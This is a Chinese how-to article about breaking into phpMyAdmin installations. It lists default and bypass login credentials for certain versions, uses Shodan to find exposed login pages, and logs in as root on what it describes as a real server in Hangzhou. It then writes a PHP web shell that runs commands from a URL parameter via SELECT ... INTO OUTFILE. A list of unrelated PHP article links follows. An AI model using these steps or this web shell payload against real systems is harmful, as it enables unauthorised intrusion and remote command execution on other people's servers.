phpMyAdmin通過密碼漏洞留后門文件
- 默認(rèn) phpMyAdmin:用戶名 root 密碼 root 或空登陸。
- 版本 2.11.3~2.11.4:用戶名
'localhost'@'@"登陸,無需密碼。 - 版本 2.11.9.2:用戶名
root登陸,無需密碼。
經(jīng)測試,第二個(gè)漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。
下面讓我們簡單的上網(wǎng)看看能不能找到一些存在這樣漏洞的登陸頁面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin

先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個(gè)國內(nèi)的(浙江省·杭州市)。

地址已手動(dòng)打碼。
http://121.***.*.219:80/

登陸成功(root 權(quán)限)。

接下來你可以寫一個(gè) outfile 到對方主機(jī)的網(wǎng)絡(luò)目錄下。俗稱 “留后門”。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"
點(diǎn)擊運(yùn)行,不出意外便在對方主機(jī)留下了一個(gè)名為 runme.php 的后門文件。
總結(jié)
以上就是這篇文章的全部內(nèi)容了,希望本文的內(nèi)容對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,謝謝大家對腳本之家的支持。如果你想了解更多相關(guān)內(nèi)容請查看下面相關(guān)鏈接
相關(guān)文章
php項(xiàng)目中類的自動(dòng)加載實(shí)例講解
在本篇文章里小編給大家整理的是關(guān)于php項(xiàng)目中類的自動(dòng)加載的實(shí)例內(nèi)容以及相關(guān)代碼,需要的朋友們學(xué)習(xí)下。2019-09-09
方便實(shí)用的PHP生成靜態(tài)頁面類(非smarty)
不喜歡Smarty,直接寫了一個(gè)生成靜態(tài)的類,方便簡單實(shí)用,希望大家繼續(xù)完善。2008-11-11
PHP實(shí)現(xiàn)的操作數(shù)組類庫定義與用法示例
這篇文章主要介紹了PHP實(shí)現(xiàn)的操作數(shù)組類庫定義與用法,結(jié)合實(shí)例形式分析了php數(shù)組操作類完整定義與簡單使用技巧,需要的朋友可以參考下2019-05-05
PHP實(shí)現(xiàn)UTF-8文件BOM自動(dòng)檢測與移除實(shí)例
這篇文章主要介紹了PHP實(shí)現(xiàn)UTF-8文件BOM自動(dòng)檢測與移除的方法,實(shí)例講述了UTF-8文件BOM信息的原理與PHP對此的檢測與刪除方法,是非常實(shí)用的技巧,需要的朋友可以參考下2014-11-11
php實(shí)現(xiàn)讀取手機(jī)客戶端瀏覽器的類
這篇文章主要介紹了php實(shí)現(xiàn)讀取手機(jī)客戶端瀏覽器的類,可實(shí)現(xiàn)取手機(jī)號碼,瀏覽器報(bào)頭信息,取得手機(jī)類型,取得手機(jī)IP等功能,需要的朋友可以參考下2015-01-01
php比較多維數(shù)組中值的大小排序?qū)崿F(xiàn)代碼
php中根據(jù)數(shù)組的鍵(key)進(jìn)行比較,排序,有很多內(nèi)置函數(shù)可以輕松解決,如krsort(), ksort()等。如果是根據(jù)數(shù)組的值(value)進(jìn)行比較就麻煩一些2012-09-09
PHP中開發(fā)XML應(yīng)用程序之基礎(chǔ)篇 添加節(jié)點(diǎn) 刪除節(jié)點(diǎn) 查詢節(jié)點(diǎn) 查詢節(jié)
XML(可擴(kuò)展的標(biāo)注語言)是一種W3C標(biāo)準(zhǔn),主要用于Web應(yīng)用程序和服務(wù)器之間實(shí)現(xiàn)容易的交互、數(shù)據(jù)的存儲(chǔ)與使用2010-07-07

